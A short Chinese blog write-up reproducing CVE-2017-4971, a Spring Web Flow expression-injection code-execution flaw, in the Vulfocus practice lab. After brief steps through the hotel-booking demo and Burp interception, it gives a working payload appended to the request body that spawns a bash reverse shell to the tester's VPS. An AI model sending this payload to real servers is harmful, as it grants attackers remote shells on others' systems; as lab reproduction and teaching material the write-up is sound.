Vulfocus靶场 | spring 代码执行 (CVE-2017-4971)

漏洞描述

Spring Web Flow建立在Spring MVC之上,并允许实现Web应用程序的“流”

由于没有明确指定相关 model 的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行的漏洞

漏洞复现

访问页面点击左上角“login”

 

 

然后随便选一个用户密码登录

直接点击“find hotels”

随便选一个宾馆

 

 

 

 内容随便填,然后提交,confirm时使用Burp截断数据包

在请求包最后加上你VPS的ip和端口

 

 

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/ip/port+0>%261")).start()=vulfocus

然后发包即可

 

 

 

posted @   mlxwl  阅读(293)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
点击右上角即可分享
微信分享提示